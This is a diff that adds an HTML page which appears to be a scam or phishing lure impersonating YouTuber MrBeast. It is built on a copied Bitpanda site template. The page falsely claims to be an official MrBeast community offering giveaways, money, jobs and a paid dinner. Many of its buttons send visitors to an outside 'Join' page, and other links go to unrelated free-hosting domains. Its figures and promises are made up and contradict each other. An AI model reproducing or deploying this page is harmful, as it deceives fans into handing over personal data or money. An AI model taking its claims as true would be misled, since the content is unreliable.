--- a/index.html
+++ b/index.html
@@ -1,1 +1,621 @@
-<h1> Refresh Page</h1>
+<!DOCTYPE html><html class=light lang=en><head><script src="https://www.googleoptimize.com/optimize.js?id=OPT-N3D6ZNP"></script><script>if(document.cookie.match("uc_performance_v1_0=accepted")?.length){ window.dataLayer.push({'event': 'optimize.activate'}); }</script><meta charset=utf-8><title>Join The MrBeast Team | Win a ton of money and amazing prizes </title><meta content=Bitpanda name=author><meta content="width=device-width, initial-scale=1.0" name=viewport>
+
+<meta content=https://vote-bts.unaux.com/ 
+
+property=og:url><meta content=origin name=referrer>
+
+
+
+<meta content="Win lots of money | mr Beast" name=description>
+
+<meta content="Win Lots of money and cool prizes | Mr Beast" name=title><link href=https://www.bitpanda.com/en rel=canonical><link href=/en hreflang=x-default rel=alternate><link href=/en hreflang=en rel=alternate><link href=/de hreflang=de rel=alternate><link href=/fr hreflang=fr rel=alternate><link href=/es hreflang=es rel=alternate><link href=/it hreflang=it rel=alternate><link href=/pl hreflang=pl rel=alternate><meta content="index, follow " name=robots><meta content=article property=og:type><meta content="mr beast" property=og:title>
+
+
+
+
+
+
+
+
+
+<meta content="Win lots of money and cool prizes | Mr Beast" property=og:description><meta content=https://cdn.bitpanda.com/media/og-images-open-graph/bitpanda-og.png property=og:image><link href="https://cdn.bitpanda.com/app/v2/css/all.min.css?id=622e023bba9164dff838" rel=stylesheet><script src="https://cdn.bitpanda.com/app/v2/js/head.min.js?id=e37b5634f1d9be3b8e80"></script>
+
+
+
+
+
+
+
+<body class="default home light" style="position: unset;"><header id=layout-header><header><div class="bp-nav js-contains-anchor"><div class=bp-nav__container><div class=util-flex-shrink-0>
+
+
+
+
+
+<h3>Mr Beast</h3>
+
+
+
+</div> <div class=util-visible-desktop><ul class=bp-nav__navigation><li><div class=bp-nav__item><div class=bp-nav__item__text>Invest</div> <div class=bp-dropdown><ul class=bp-dropdown__grid><li class=bp-dropdown__grid-list><div class=bp-dropdown__title>Invest in:</div> <ul><li><a aria-current=true bp-expand=bp-expand-1 class=bp-dropdown__item 
+
+
+
+
+
+href=https://fans-georgestrait.unaux.com/>
+
+
+
+<img alt="Cryptocurrencies &lt;small&gt;Buy, sell &amp; swap cryptocurrencies&lt;/small&gt;" height=36 src=https://cdn.bitpanda.com/media/New%20navigation_Rebrand%203.0/Cryptos.svg width=36> <div> Mr Beast <small>mr Beast</small> </div></a> <li>
+
+
+
+
+
+
+
+
+
+
+
+<a aria-current=false bp-expand=bp-expand-2 class=bp-dropdown__item href="https://fans-georgestrait.unaux.com/">
+
+
+
+
+<img alt="Stocks* &lt;small&gt;Invest in stocks with zero commissions&lt;/small&gt;" height=36 src=https://cdn.bitpanda.com/media/New%20navigation_Rebrand%203.0/Stocks.svg width=36> <div> Stocks* <small>Join Mr Beast Community WIN AN ALL EXPENSES PAID DINNER WITH Mr Beast And A Ton Of Money</small> </div></a> <li><a aria-current=false bp-expand=bp-expand-3 class=bp-dropdown__item href=https://www.bitpanda.com/en/invest/bitpanda-stocks><img alt="ETFs* &lt;small&gt;Invest in ETFs 24/7&lt;/small&gt;" height=36 src=https://cdn.bitpanda.com/media/New%20navigation_Rebrand%203.0/etf-1.svg width=36> <div> ETFs* <small>MrBeast</small> </div></a> <li><a aria-current=false bp-expand=bp-expand-4 class=bp-dropdown__item href=https://www.bitpanda.com/en/bci-bitpanda-crypto-index>
+
+
+
+<img alt="Crypto Indices &lt;small&gt;The world&#039;s first real crypto index&lt;/small&gt;" height=36 src=https://cdn.bitpanda.com/media/New%20navigation_Rebrand%203.0/BCI.svg width=36> <div> MrBeast<small>MrBeast</small> </div></a> 
+
+
+
+
+
+
+
+
+
+
+
+
+<li><a class=bp-dropdown__item href=https://www.bitpanda.com/en/press-downloads><div> MrBeast</div> </a> <li><a class=bp-dropdown__item href=https://www.bitpanda.com/en/career><div> MrBeast</div> </a> </ul> </ul> </div></div> <li class=bp-dropdown__align-anchor><div class=bp-nav__item><div class=bp-nav__item__text>Help</div> <div class="bp-dropdown bp-dropdown--padding-sm"><ul class=bp-dropdown__grid><li class=bp-dropdown__grid-list><ul><li><a class=bp-dropdown__item href=https://support.bitpanda.com/hc/en-us/articles/360001705580-I-m-new-to-Bitpanda-Where-should-I-start-><div> How to get started </div> </a> <li><a class=bp-dropdown__item href=https://support.bitpanda.com/hc/en-us/articles/360019578140-Who-can-use-Bitpanda-><div>MrBeast</div> </a> <li><a class=bp-dropdown__item href=https://www.bitpanda.com/en/limits><div> Payment methods and limits </div> </a> <li><a class=bp-dropdown__item href=https://blog.bitpanda.com/en/why-data-privacy-is-important-to-us><div> Privacy policy </div> </a> <li><a class=bp-dropdown__item href=https://support.bitpanda.com/hc/en-us><div> Helpdesk </div> </a> </ul> </ul> </div></div> <li id=js-primary-search-modal-toggler uk-toggle="target: #search-modal"><div class="bp-dropdown--search-button bp-nav__item"><a class=bp-nav__circle-button href=/><svg class=bp-symbol style="--bp-symbol-size: 11px;"><use xlink:href=#icon-magnifier></use> </svg> </a> </div> </li> 
+
+
+
+
+
+
+
+
+
+
+
+
+<script>(function() { document.getElementById('js-primary-search-modal-toggler').addEventListener('click', function() { setTimeout(function(){ document.getElementById('search-input-modal').focus();} ,500); }); })();</script></ul> </div> <div class=util-visible-desktop><div><ul class=bp-nav__navigation><li class=bp-dropdown__align-anchor><div class=bp-nav__item><div class=bp-nav__item__text><svg class=bp-symbol style="vertical-align: text-top;"><use xlink:href=#icon-globe></use> </svg> EN <svg class=bp-symbol style="--bp-symbol-size: 10px; vertical-align: inherit;"><use xlink:href=#icon-chevron-down></use> </svg> </div> <div class="bp-dropdown bp-dropdown--padding-sm"><ul class=bp-dropdown__grid><li class=bp-dropdown__grid-list><ul><li><a class=bp-dropdown__item href=/en><div> English </div> </a> <li><a class=bp-dropdown__item href=/de><div> Deutsch </div> </a> <li><a class=bp-dropdown__item href=/fr><div> Français </div> </a> <li><a class=bp-dropdown__item href=/es><div> Español </div> </a> <li><a class=bp-dropdown__item href=/it><div> Italiano </div> </a> <li><a class=bp-dropdown__item href=/pl><div> Polski </div> </a> </ul> </ul> </div></div> </ul> </div> <div>
+
+
+
+<a class=bp-button href=https://mr-beast-team.github.io/Join/ title="Log in">Join Mr Beast</a></div> <div><a class="bp-button bp-button--primary" https://mr-beast-team.github.io/Join/  target=_blank title=Sign-up> Join Mr Beast</a></div></div>
+
+
+
+
+<div class=util-visible-mobile><div><a class="bp-button bp-button--primary" href="https://mr-beast-team.github.io/Join/" target=_blank title=Sign-up>Join Mr Beast</a></div> 
+
+
+</div></div> </div> <script>function toggleTarget(e) { const item = e.currentTarget; const currentTarget = document.getElementById(e.currentTarget.getAttribute("bp-expand")); if (currentTarget !== activeTarget) { activeTarget.setAttribute("aria-expanded", "false"); currentTarget.setAttribute("aria-expanded", "true"); activeTarget = currentTarget;
+activeItem.setAttribute("aria-current", "false"); item.setAttribute("aria-current", "true"); activeItem = item; } } let activeTarget = document.getElementById("bp-expand-1"); let activeItem = document.querySelectorAll("[bp-expand=bp-expand-1]")[0]; document.querySelectorAll("[bp-expand]").forEach(function (item) { item.addEventListener("mouseenter", toggleTarget, false); item.addEventListener("focus", toggleTarget, false); });</script> <div aria-expanded=false class=bp-offcanvas><div class=bp-offcanvas__header>
+
+
+
+
+
+
+
+
+
+
+
+
+
+<a href="https://mr-beast-team.github.io/Join/">
+
+<img alt=Bitpanda class=lazyload data-src=" https://cdn.bitpanda.com/media/Ukraine/U-bitpanda-logo.svg " height=40 width=136>
+
+
+
+
+</a>
+
+
+
+
+
+
+
+
+
+
+
+
+
+<button class="bp-button bp-button--transparent" onclick=toggleOffcanvas();><svg class=bp-symbol><use xlink:href=#icon-close></use> </svg> </button></div> <div class=bp-offcanvas__search-area><div class="bp-form-element bp-form-element--can-focus bp-form-element--large" id=js-mobile-search-modal-toggler uk-toggle="target: #search-modal"><input placeholder=Search type=search> <svg class=bp-symbol><use xlink:href=#icon-magnifier></use> </svg></div> <script>(function() { document.getElementById('js-mobile-search-modal-toggler').addEventListener('click', function() { setTimeout(function(){ document.getElementById('search-input-modal').focus();} ,500); }); })();</script> <div class="bp-form-element bp-form-element--can-focus bp-form-element--large"><svg class=bp-symbol><use xlink:href=#icon-globe></use> </svg> 
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+<script>function minimiseAll() { document.querySelectorAll("#js-offcanvas-nav > ul > li").forEach(function(li) { li.setAttribute("aria-expanded", false); }) } document.querySelectorAll("#js-offcanvas-nav > ul > li").forEach(function(li) { li.addEventListener("click", function(e) { if(e.currentTarget.getAttribute("aria-expanded") === "true") { e.currentTarget.setAttribute("aria-expanded", false); } else { minimiseAll(); e.currentTarget.setAttribute("aria-expanded", true); } }); }) function toggleOffcanvas(e) { const offcanvas = document.querySelectorAll(".bp-offcanvas")[0]; if(offcanvas.getAttribute("aria-expanded") === "false") { offcanvas.setAttribute("aria-expanded", "true"); } else { offcanvas.setAttribute("aria-expanded", "false"); } } function changeLanguage(e) { document.location = e.value; }</script>
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+</header> <div id=mobile-nav uk-offcanvas="overlay: true;">
+
+
+
+
+
+
+
+
+
+<script>const ENTER_KEY_CODE = 13;
+$(document).ready(function () { $('#search-input-modal').keydown(function (event) { const keyCode = (event.keyCode ? event.keyCode : event.which); if (keyCode === ENTER_KEY_CODE) { const searchFilter = '' || ''; const searchLink = `/en/search?${searchFilter.length === 0 ? '' : 'filter=' + searchFilter + '&'}query=${$(this).val()}`; document.location.href = searchLink; } }); });</script></header> <section id=layout-content tabindex=-1><section class="default uk-padding-remove-bottom uk-section"><div class=uk-container><div class="uk-child-width-1-2@m uk-flex-middle uk-grid" uk-grid=""><div class=default><section class="module-text uk-padding-remove-bottom uk-padding-remove-top uk-section uk-text-left uk-text-left@m"><div class=module-text__content><h4><strong>Join Mr Beast Exclusive Community- Free! Win An All Expenses Paid Dinner With Mr Beast And Compete For A Ton Of Money And Cool Prizes In Mr Beast YouTube Videos.<br>
+
+Do you want to join MrBeast's team?
+
+</strong></h4> </div> 
+
+
+
+
+
+
+
+<br> <center>
+
+
+
+<a href="https://mr-beast-team.github.io/Join/">
+
+
+<div>
+
+
+<img src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcT3XDa5oPkBeb0egBZQaYpw_FKQFUxfKTIEJw&amp;usqp=CAU" class="rg_i Q4LuWd" jsname="Q4LuWd" width="360" height="460" alt="MrBeast logo and his history | LogoMyWay" data-iml="7275.099999998929">
+
+
+
+<img src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcT9gzJ9jGDYxwKWfGbaZVpV0WXIHY5QbDelBw&amp;usqp=CAU" jsaction="load:XAeZkd;" jsname="HiaYvf" class="n3VNCb KAlRDb" alt="Youtuber MrBeast quer alcançar fortuna de US$ 1,5 bilhão - TecMundo" data-iml="18556.899999966845" style="width: 360px; height: 200px; margin: 0px;">
+
+
+</div>
+
+
+
+</a></center> 
+
+
+
+
+<br>
+<p>Mr Beast Exclusive community is a platform managed by Mr Beast, Where MrBeast’s massive and loyal audience / fans come together from all over the world to connect with Mr Beast - Free! <br> 
+
+
+
+
+<strong>Mr Beast regularly Gives away a ton of money to members of his exclusive community. And if you just want the fame, Mr Beast chooses people to compete for money and other cool prizes in his YouTube videos from his execlusive community</strong> it's also where He chooses people that work for him (YouTube Job). <br> <br>Click on
+
+"<a href="https://mr-beast-team.github.io/Join/"> JOIN MR BEAST</a>"
+
+to get started
+
+
+
+
+
+
+
+
+
+
+
+
+
+<center> <div class="js-bp3-cta-button module-text__buttons"><span class=primary-button><a class="desktop-button tk-get-started-button uk-button uk-button-large uk-button-primary"
+
+href="https://mr-beast-team.github.io/Join/">
+
+
+
+&nbsp &nbsp Join Mr Beast▶&nbsp &nbsp
+
+
+
+</a> <a class="mobile-button tk-get-app-button uk-button uk-button-large uk-button-primary" href="https://mr-beast-team.github.io/Join/">
+
+
+
+
+
+&nbsp &nbsp Join Mr Beast ▶&nbsp &nbsp 
+
+
+
+
+
+</a></span> </div> </center> 
+
+
+
+
+<br>
+
+
+
+Mr Beast exists to leverage the power of social media platforms and spread a message of empathy and kindness to MrBeast’s massive and loyal audience in a way that ignites their desire to follow the example he sets.
+
+
+
+
+
+<br> <br>
+
+Basically every one you see in Mr Beast Videos is a member of Mr Beast Exclusive Community. 
+
+<br> 
+
+When you join the Mr Beast Exclusive Community you become an official member of the Mr Beast team.
+
+
+</p>
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+<center> <div class="js-bp3-cta-button module-text__buttons"><span class=primary-button><a class="desktop-button tk-get-started-button uk-button uk-button-large uk-button-primary"
+
+
+
+href="https://mr-beast-team.github.io/Join/">
+
+&nbsp &nbsp Join Mr Beast▶&nbsp &nbsp
+
+</a> <a class="mobile-button tk-get-app-button uk-button uk-button-large uk-button-primary" href="https://mr-beast-team.github.io/Join/">
+
+
+&nbsp &nbsp Join Mr Beast ▶&nbsp &nbsp 
+
+
+
+
+
+</a></span> </div> </center> 
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+<br>
+
+
+<strong><h4>Who We Are</h4></strong>
+
+<p>We are the largest YouTube brand in the world, renowned for our seemingly impossible creative ingenuities. At MrBeast, we attribute much of our success to putting our four foundational pillars of viral content above everything else: IRL Comedy, Spectacles, General Good, and Philanthropy. Our YouTube presence boasts 6 channels, 146 million subscribers, 30 billion video views, and a 501c3 accredited charity
+
+</p>
+
+
+
+
+
+<br>
+
+
+
+<a href="https://mr-beast-team.github.io/Join/">
+<div>
+<img src="https://i.ytimg.com/vi/er5LLR2oCmg/maxresdefault.jpg" jsaction="load:XAeZkd;" jsname="HiaYvf" class="n3VNCb KAlRDb" alt="Who is MrBeast and why does he have so many YouTube subscribers ..." data-iml="17738.700000103563" style="width: 360px; height: 180px; margin: 0px;">
+
+
+<img src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcT9gzJ9jGDYxwKWfGbaZVpV0WXIHY5QbDelBw&amp;usqp=CAU" jsaction="load:XAeZkd;" jsname="HiaYvf" class="n3VNCb KAlRDb" alt="Youtuber MrBeast quer alcançar fortuna de US$ 1,5 bilhão - TecMundo" data-iml="18556.899999966845" style="width: 360px; height: 200px; margin: 0px;">
+
+</div></a>
+
+<br> <br>
+
+
+
+<strong>
+<center><h3>Awesome Perks! <br></strong>
+
+The Perks, Why join the MrBeast exclusive community </center><br>
+
+
+
+
+
+
+
+<center><h3>
+
+*Fame <br> <br>*Generous Giveaways<br> <br>*Generous Salary<br> <br> *Supportive Environment<br> <br>*Technology Package <br> <br>
+
+
+
+</h3></center>
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+<center>
+
+
+
+<div class="js-bp3-cta-button module-text__buttons"><span class=primary-button><a class="desktop-button tk-get-started-button uk-button uk-button-large uk-button-primary"
+
+
+
+
+
+href="https://mr-beast-team.github.io/Join/">
+
+
+
+Join Mr Beast ▶&nbsp 
+
+</a> <a class="mobile-button tk-get-app-button uk-button uk-button-large uk-button-primary" 
+
+href="https://mr-beast-team.github.io/Join/"> &nbsp 
+
+&nbsp Join Mr Beast ▶&nbsp </a></span> </div> 
+
+
+
+</center>
+
+
+
+
+
+<br> 
+
+
+<center>
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+<h3>By The Numbers </h3> 
+
+
+
+<h4>225 million+<br>SUBSCRIBERS<br> <br>
+
+25 billion+<br>TOTAL VIEWS<br> <br>
+
+$20 million+<br>DONATED <br> <br> 
+
+
+
+
+
+<center> <div class="js-bp3-cta-button module-text__buttons"><span class=primary-button><a class="desktop-button tk-get-started-button uk-button uk-button-large uk-button-primary"
+
+
+
+href="https://mr-beast-team.github.io/Join/">
+
+&nbsp &nbsp Join Mr Beast▶&nbsp &nbsp
+
+</a> <a class="mobile-button tk-get-app-button uk-button uk-button-large uk-button-primary" href="https://mr-beast-team.github.io/Join/">
+
+
+&nbsp &nbsp Join Mr Beast ▶&nbsp &nbsp 
+
+
+
+
+
+</a></span> </div> </center> 
+
+
+
+
+
+
+
+
+
+
+<section class="module-steps module-steps--has-image module-steps--image-48x48 uk-section"><div class=uk-container><div class="module-steps__main uk-child-width-1-1 uk-child-width-1-2@m uk-child-width-1-3@l uk-flex-center uk-flex-top uk-grid uk-grid-match">
+
+<div class="module-steps__step module-steps__step--has-image">
+
+<div class="module-steps__step-image uk-text-left">
+
+</div></div> 
+
+
+
+
+
+
+
+<div class="module-steps__step module-steps__step--has-image module-steps__step-border"><div class="module-steps__step-image uk-text-left"><picture><img alt="" class="lazyload module-steps__image-background" data-src=https://cdn.bitpanda.com/media/Website%203.0/Home%203.0/Community.svg uk-img=""> </picture> </div> <div class="module-steps__step-content uk-text-left"><div><h3><strong>Mr Beast</strong></h3> 
+
+
+
+<p>"&nbsp I like to take a moment to thank the millions of fans from all over the world, who I feel simply haven't been thanked enough, you provided me with endless support, thank you, I couldn't have done all this without you". <br> <br> &nbsp&nbsp &nbsp &nbsp &nbsp &nbsp &nbsp &nbsp &nbsp&nbsp-- <strong>Mr Beast</strong> <p><br>
+
+
+
+
+
+
+
+<p><br> </div> </div></div> <div class="module-steps__step module-steps__step--has-image module-steps__step-border">
+
+
+
+
+
+
+
+
+
+
+
+
+<br> <br> <br> <br>
+
+
+<br>
+
+
+
+
+
+
+
+
+<section class="module-text uk-padding-small-top uk-section uk-text-center uk-text-left@m"><div class=module-text__content><p class=bp-text--sm>*For an all expense paid dinner with Mr Beast, all application will be put in a raffle draw, and a winner will be selected from each state.<p><br> </div> </section></div> </section> 
+
+
+
+
+
+
+
+
+<br> 
+
+
+
+
+
+
+
+
+
+<script>window.initScriptLater = function (scriptUrl, fallback) { const script = document.createElement("script"); script.onload = fallback; script.src = scriptUrl;
+document.addEventListener("readystatechange", () => { if (document.readyState === "interactive") { document.head.appendChild(script); } }); };
+window.initScriptLater("https://cdn.bitpanda.com/app/v2/js/cta-button.min.js?id=d34a8a89944479eef669", () => window.initCtaButton() );</script></div></nav> </div> </div></div> </section> <section class=footer__navbar><div class=uk-container><div class="uk-child-width-auto@s uk-flex-between uk-flex-middle" uk-grid="">
+
+
+
+
+
+
+
+<div>
+
+
+
+
+
+
+
+</section> <section class="footer__navbar footer__navbar--sm footer__navbar__gradient"><div class=uk-container><div class=uk-flex-between uk-grid=""><div class="uk-text-center uk-text-right@m uk-width-1-1 uk-width-auto@m">
+
+
+
+
+
+
+
+
+
+</path> </symbol></svg>
+
+
+
+
+</body></html>
